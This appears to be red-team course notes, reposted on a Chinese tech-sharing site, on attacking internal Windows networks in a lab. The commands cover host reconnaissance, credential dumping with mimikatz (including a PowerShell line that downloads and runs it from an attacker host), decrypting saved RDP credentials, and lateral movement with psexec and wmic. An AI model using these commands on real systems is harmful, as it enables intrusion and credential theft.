标签:收集 查看 补充 主机 密码 mimikatz net 内网
0x01. 内网机器信息收集
1. 内网信息收集
内网是分布在一个区域性的网络,也称之为局域网,针对于内网不公开于互联网之上,内网分为好几种类型,有服务器内网、办公区域内网等等,内网可以方便的传输,以及可以保证其数据的安全,其资产不亚于暴露外网的资产多,内网信息收集也是非常重要的。
作为红队来讲,突破内网的前提下就是针对于内网的信息收集,内网的资产分布式很广,不仅是WEB,甚至开放了各种危险端口,在内网中机器不保证其开防火墙,所以我们可以任由横穿,假设内网机器大量没有打补丁的ms17010漏洞,我们就可以横穿其内网了。
再一方面,即使内网很安全,当我们收集到密码之后去撞库,测试一下密码是否被重复使用,也可以实现攻破其他主机。
2. 内网信息收集隐蔽
在收集内网信息的前提下,我们需要针对管理员的登录时间进行查看
net user administrator // 查看最后登录时间
wevtutil epl security C:\System_log.evtx // 保存所有日志信息 , 需要管理员权限
举例 : 使用物理机 , 远程链接靶机 , 然后在靶机上执行导出日志 , 打开日志查看是否有远程登录信息
看到了刚才远程链接电脑的IP地址啦
0x02. 内网信息收集命令
1. 内网本机信息收集命令-1
ipconfig /all 查询本机IP信息是否多网卡
net user 查看本机有几个账户
query user 查看在线的用户
tasklist /v 显示所有运行的进程
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查询系统版本
systeminfo 查看补丁信息
net share 查看共享信息
netsh firewall show config 查看防火墙信息
net statistics workstation 查看开机时间
补充 :finsubnet(Mac).py 发现内网具有两张网卡的主机
python27 finsubnet(Mac).py -i 192.168.1.1-192.168.1.254
2. 内网本机信息收集命令-2
wmic product get name,version 查看安装软件
net session 查看会话
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 开启rdp
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 查看rdp对应的端口
net config workstation 查看是否存在域环境
netsh wlan show profiles 查看链接过的wifi
netsh wlan show profiles name="WiFi名称" key=clear命令 查看具体wifi密码
3. RDP连接历史记录
针对某些服务器/个人PC场景,我们可以使用以下命令查看连接过的记录。
注意:是查看当前主机都用远程链接链接过那些主机
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
4. 针对内网主机提权
使用命令 : systeminfo
将信息复制到即可自动寻找提权exp
http://bugs.hacking8.com/tiquan/
5. 内网资产的脆弱性
漏洞危害(CVE)
敏感信息泄露
服务弱口令
历史密码
浏览器记录
连接历史记录 (xshell等等)
0x03. 内网主机探测及扫描
1. 内网穿透–流量代理
流量代理出网是将目标机器的内网代理出自己的机子,之后再进行扫描,一般代理出网的代理大部分都socks5、socks4,流量代理的工具有很多,个人感觉最好的还是Frp比较稳定。
内网流量转发
#frpc.ini
[common]
server_addr = 0.0.0.0
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 6554
plugin = socks5
2. 内网区域大小探测
我们可以通过arp /a来观察网段的总体情况
私有IP地址有10段、172段、192段,大小 : 从大到小排序的
A类地址
10.0.0.0--10.255.255.255
B类地址
172.16.0.0--172.31.255.255
C类地址
192.168.0.0--192.168.255.255
3. 内网主机存活检测
存活检测,可以使用批量Ping的方式或者使用其他工具软件,也可以将流量代理出来进行扫描
使用NMAP或者其他方式进行检测
当流量代理出来,我们可以使用 proxychains 去调用 nmap 进行对目标内网进行扫描
4. NTSCAN
NTSCAN是比较老的一款工具了,但是他的实用价值非常高,可以直接爆破内网内的主机
先设置账号密码字典
5. 内网弱口令检测
在内网中必定充斥着大量的弱口令服务,所以我们可以对其弱口令进行探测
使用工具:超级弱口令检查工具
6. 脆弱性WEB资产扫描
我们可以使用WebAliveScan对其内网进行脆弱性WEB资产扫描,首先我们收集存活的内网IP之后对其扫描。
地址: https:/lgithub.com/cangqingzhe/WebAliveScan
安装 pip3 install -r requirements.txt
使用 :
python3 webscan.py --target target.txt --port 80
python3 webscan.py --target target.txt --port large
7. 内网流量嗅探
这款工具可以嗅探到内网的流量,并且可以主动收集内网的密码,不过操作可能比较复夺这里我实操来演示
ARP欺骗 , 软件使用教程
然后欺骗我们的靶机119那个
然后靶机119 , 登录一个网站 , 这个站点是明文传输的 ,而且提交的字段在我们的字段字典中
返回攻击机查看 , 得到账号和密码
补充 :关于ARP欺骗之前的笔记有详细
0x04. 内网主机密码收集
1. mimikatz抓取本机密码
mimikatz是一款简单且好用的windows密码抓取神器,该软件可帮助用户一键抓取window密码,操作简单、使用方便。
在域渗透过程中另外一名老师会为大家讲解mimikatz的一些高级使用,这里只做简单介绍
进入到mimikatz目录(必须system权限)
mimikatz.exe // 启动工具
privilege::debug //提升权限
sekurlsa::logonpasswords //抓取密码
一条命令也可以
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
//powershell远程加载方式
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.156/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz
2. lazagne抓取密码
LaZagne是一款功能比较多的抓取密码工具,可以抓取windows、wifi、浏览器、数据库等密码。
下载地址: https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3
3. xshell密码抓取密码
在内网渗透中可能会发现连接ssh的相关信息,一般都是xshell程序,我们可以使用该程序来对xshell的密码进行破
解,安装以及生成exe的过程如下:
https://github.com/dzxs/Xdecrypt
4. SharpDecryptPwd密码抓取工具
SharpDecryptPwd是一款强大的密码解密工具,支持五种方式,包括native、teamviewer,filezilla、WinSCP、Xmanager。
https://github.com/uknowsec/SharpDecryptPwd
5. mimikatz获取rdp连接记录密码
注意:是获取当前主机链接过那些主机的3389记录
1.查找本地的Credentials (证书) , 靶机执行
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
2.使用mimikatz进行操作 (管理员权限运行)
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B" "sekurlsa::dpapi" exit
jack是当前靶机的登录用户(x)
guidMasterkey是我们需要的
根据我们记录的guidMasterkey得到MasterKey(加密密钥)
* MasterKey : 3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925
最后就差解密了,我这里面是 , 依然是在mimikatz中执行
dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B /masterkey:3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925
参考链接 : https://blog.csdn.net/q1352483315/article/details/100075078
0x05. 内网横向渗透演示
1. IPC空连接概述
前提是已经获得了目标机器的账号和密码
IPC(Internet Process Connection)是共享"命名管道"的资源。
它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c,d,e....和系统自录winnt或windows(admin)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
2. 建立空连接命令
net share 查看本机共享
net use \\IP地址 "密码" /user:用户名 对其进行空连接
net use \\192.168.0.119\c$ "a" /user:"administrator"
net use \\IP地址 /del 删除空连接
net time \\lP地址 查看机器时间
首先在攻击机上用账号和密码进行空连接 , 然后文件管理中访问靶机的C盘
补充 : 如果不能访问可能是权限问题
3. PSEXEC横向工具
微软提供的一种远程命令行工具
可直接用于对远程主机进行命令交互
psexec.exe \\lP -u domainladministrator -p password command
psexec.exe \\192.168.0.119 -u administrator -p a cmd.exe
然后在靶机上查看
4. wmic横向
wmic是一款Windows自带的工具集,可以通过/node选项直接对远程过程调用RPD访问,允许直接执行命令。
wmic /node:192.168.0.119 /user:administrator /password:a # 连接后面拼接wmic命令
靶机ip
常见的vmic命令
process call create "cmd.exe" #启动某一程序
process call create "msg jack a"
process call create "cmd.exe /c echo > c:\1.txt”
process list brief #查看所有进程
标签:收集,查看,补充,主机,密码,mimikatz,net,内网 来源: https://www.cnblogs.com/xcymn/p/15721440.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。